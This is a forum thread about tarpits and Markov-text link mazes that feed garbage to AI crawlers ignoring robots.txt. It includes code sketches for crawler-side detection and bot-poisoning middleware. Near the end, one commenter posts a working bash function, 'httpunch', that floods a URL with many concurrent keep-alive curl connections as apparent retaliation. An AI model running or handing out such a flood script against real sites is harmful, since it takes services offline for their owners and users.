Does the inferred "topic" of the domain match the topic of the individual pages? If not -> manual review. And there are many more indicators.
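As a rough sketch of that topic check (an assumed heuristic, not anyone's actual pipeline), you could compare each page's term distribution against a domain-wide profile and flag outliers for review; a real system would use a proper topic model rather than bag-of-words cosine similarity.

# Sketch of a domain-vs-page topic consistency check (assumed heuristic,
# not any particular crawler's implementation). Bag-of-words cosine
# similarity stands in for a real topic model.
import math
import re
from collections import Counter

def term_vector(text: str) -> Counter:
    """Lowercased word counts, ignoring very short tokens."""
    return Counter(re.findall(r"[a-z]{3,}", text.lower()))

def cosine(a: Counter, b: Counter) -> float:
    dot = sum(a[t] * b[t] for t in set(a) & set(b))
    norm = math.sqrt(sum(v * v for v in a.values())) * math.sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0

def flag_for_review(domain_pages: dict[str, str], threshold: float = 0.15) -> list[str]:
    """Return URLs whose content diverges from the domain-wide profile."""
    domain_profile = Counter()
    for text in domain_pages.values():
        domain_profile.update(term_vector(text))
    return [
        url for url, text in domain_pages.items()
        if cosine(domain_profile, term_vector(text)) < threshold
    ]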
Hire a bunch of student jobbers, have them search github for tarpits, and let them write middleware to detect those.
If you are doing broad crawling, you already need to do this kind of thing anyway.
There's a ton of these types of things online; you can't, e.g., exhaustively crawl every Wikipedia mirror someone's put online.
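One hypothetical shape for that middleware: fingerprint response bodies and stop spending crawl budget on domains that mostly serve content already seen elsewhere, which catches mirrors and many generated tarpits. This is a stdlib sketch under those assumptions, not code from any crawler discussed here; a real system would use shingling or simhash rather than exact hashes.

# Hypothetical crawl middleware: track content fingerprints per domain and
# stop fetching from domains that mostly serve pages already seen elsewhere
# (typical of Wikipedia mirrors and generated tarpits).
import hashlib
from collections import defaultdict

class DuplicateDomainFilter:
    def __init__(self, min_pages: int = 50, max_dup_ratio: float = 0.8):
        self.seen_hashes: set[str] = set()          # fingerprints seen anywhere
        self.stats = defaultdict(lambda: [0, 0])    # domain -> [pages, duplicates]
        self.min_pages = min_pages
        self.max_dup_ratio = max_dup_ratio

    def should_keep_crawling(self, domain: str, body: bytes) -> bool:
        fingerprint = hashlib.sha256(body).hexdigest()
        counts = self.stats[domain]
        counts[0] += 1
        if fingerprint in self.seen_hashes:
            counts[1] += 1
        else:
            self.seen_hashes.add(fingerprint)
        pages, dups = counts
        if pages < self.min_pages:
            return True                              # not enough evidence yet
        return (dups / pages) < self.max_dup_ratio   # drop mostly-duplicate domains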
Not really? As mentioned by others, such tarpits are easily mitigated by using a priority queue. For instance, crawlers can prioritize external links over internal links, which means if your blog post makes it to HN, it'll get crawled ahead of the tarpit. If it's discoverable and readable by actual humans, AI bots will be able to scrape it.
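A minimal sketch of that priority-queue idea (hypothetical, not any specific crawler's frontier): links discovered on a different host outrank links found on the same host, so a tarpit's self-links can't starve externally referenced pages. The URLs in the usage lines are placeholders.

# Minimal crawl frontier sketch: links discovered from a different host get
# higher priority than internal links, so a tarpit's self-links never starve
# externally referenced pages (e.g. a blog post linked from HN).
import heapq
import itertools
from urllib.parse import urlparse

EXTERNAL, INTERNAL = 0, 1   # lower number = higher priority

class Frontier:
    def __init__(self):
        self._heap = []
        self._counter = itertools.count()   # tie-breaker keeps FIFO order within a priority

    def add(self, url, found_on=None):
        same_host = found_on and urlparse(found_on).netloc == urlparse(url).netloc
        priority = INTERNAL if same_host else EXTERNAL
        heapq.heappush(self._heap, (priority, next(self._counter), url))

    def pop(self):
        return heapq.heappop(self._heap)[2]

frontier = Frontier()
frontier.add("https://example.com/blog/post")   # discovered externally
frontier.add("https://tarpit.example.net/maze/1", found_on="https://tarpit.example.net/")  # self-link
print(frontier.pop())   # the externally discovered page comes out first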
My tool does have a second component - linkmaze - which generates a bunch of nonsense text with a Markov generator, and serves infinite links (like Nepenthes does), but I generally only throw incorrigible bots at it (and, as others have noted in-thread, most crawlers already set some kind of limit on how many requests they'll send to a given site, especially a small site). I do use it for PHP-exploit crawlers as well, though I've seen no evidence those fall into the maze -- I think they mostly just look for some string indicating a successful exploit and move on if whatever they're looking for isn't present.
But, for my use case, I don't really care if someone fingerprints content generated by my tool and avoids it. That's the point: I've set robots.txt to tell these people not to crawl my site.
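For illustration only (not the actual Quixotic or Nepenthes code), here is a toy sketch of the linkmaze idea: a word-level Markov chain over an arbitrary corpus (corpus.txt is a placeholder filename), served by a handler that always emits a handful of fresh in-maze links.

# Toy version of the "linkmaze" idea described above: a word-level Markov
# chain generates nonsense text, and every page links to more randomly
# named maze pages.
import random
from collections import defaultdict
from http.server import BaseHTTPRequestHandler, HTTPServer

SOURCE = open("corpus.txt").read().split()   # any text to seed the chain (placeholder path)

chain = defaultdict(list)
for a, b in zip(SOURCE, SOURCE[1:]):
    chain[a].append(b)

def babble(n_words=200):
    word = random.choice(SOURCE)
    out = [word]
    for _ in range(n_words):
        word = random.choice(chain[word]) if chain[word] else random.choice(SOURCE)
        out.append(word)
    return " ".join(out)

class Maze(BaseHTTPRequestHandler):
    def do_GET(self):
        links = "".join(f'<a href="/maze/{random.getrandbits(32):x}">more</a> ' for _ in range(5))
        body = f"<html><body><p>{babble()}</p>{links}</body></html>".encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("", 8080), Maze).serve_forever()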
In addition to Quixotic (my tool) and Nepenthes, I know of:
* https://github.com/Fingel/django-llm-poison
* https://codeberg.org/MikeCoats/poison-the-wellms
* https://codeberg.org/timmc/marko/
0 - https://marcusb.org/hacks/quixotic.html
1 - I use the ai.robots.txt user agent list from https://github.com/ai-robots-txt/ai.robots.txt
Maybe you don't want your stuff to get thrown into the latest Silicon Valley commercial operation without getting paid for it. That seems like a valid position to take. Or maybe you just don't want Claude's ridiculously badly behaved scraper to chew through your entire budget.
Regardless, scrapers that don't follow rules like robots.txt will pretty quickly discover why those rules exist in the first place, as they receive increasing amounts of garbage.
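As a rough illustration of that routing (a hypothetical sketch, not anyone's production setup), a small WSGI middleware could match the request's user agent against a blocklist such as the ai.robots.txt list mentioned below and hand matching bots a garbage page instead of the real content. The user-agent substrings and disallowed prefixes here are sample placeholders; the garbage_page callable could be something like the Markov babbler sketched above.

# Hypothetical WSGI middleware: requests from user agents on a blocklist
# that hit paths robots.txt disallows for them get garbage instead of the
# real response.
AI_BOT_SUBSTRINGS = ["GPTBot", "ClaudeBot", "CCBot", "Bytespider"]   # sample entries
DISALLOWED_PREFIXES = ["/"]   # whatever your robots.txt disallows for those agents

def poison_middleware(app, garbage_page):
    def wrapped(environ, start_response):
        ua = environ.get("HTTP_USER_AGENT", "")
        path = environ.get("PATH_INFO", "/")
        is_ai_bot = any(s in ua for s in AI_BOT_SUBSTRINGS)
        is_disallowed = any(path.startswith(p) for p in DISALLOWED_PREFIXES)
        if is_ai_bot and is_disallowed:
            body = garbage_page().encode()   # e.g. the Markov babble sketched earlier
            start_response("200 OK", [("Content-Type", "text/html")])
            return [body]
        return app(environ, start_response)
    return wrapped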
httpunch() {
  local url=$1
  local connections=${2:-${HTTPUNCH_CONNECTIONS:-100}}
  local action=$1
  local keepalive_time=${HTTPUNCH_KEEPALIVE:-60}
  local silent_mode=false

  # Check if "kill" was passed as the first argument
  if [[ $action == "kill" ]]; then
    echo "Killing all curl processes..."
    pkill -f "curl --no-buffer"
    return
  fi

  # Parse optional --silent argument
  for arg in "$@"; do
    if [[ $arg == "--silent" ]]; then
      silent_mode=true
      break
    fi
  done

  # Ensure URL is provided if "kill" is not used
  if [[ -z $url ]]; then
    echo "Usage: httpunch [kill | <url>] [number_of_connections] [--silent]"
    echo "Environment variables: HTTPUNCH_CONNECTIONS (default: 100), HTTPUNCH_KEEPALIVE (default: 60)."
    return 1
  fi

  echo "Starting $connections connections to $url..."
  for ((i = 1; i <= connections; i++)); do
    if $silent_mode; then
      curl --no-buffer --silent --output /dev/null --keepalive-time "$keepalive_time" "$url" &
    else
      curl --no-buffer --keepalive-time "$keepalive_time" "$url" &
    fi
  done

  echo "$connections connections started with a keepalive time of $keepalive_time seconds."
  echo "Use 'httpunch kill' to terminate them."
}
(Generated in a few seconds with the help of an LLM, of course.) Your free speech is also my free speech. LLMs are just a very useful tool, and Llama, for example, is open source and also needs to be trained on data. And I <opinion> just can't stand knee-jerk anti-corporate AI doomers who decide to just create chaos instead of using that same energy to try to steer the progress </opinion>.
https://gist.github.com/pmarreck/970e5d040f9f91fd9bce8a4bcee...
LLMs are an accelerant, like all previous tools... not a replacement, although it seems most people still need to figure that out for themselves, while I already have.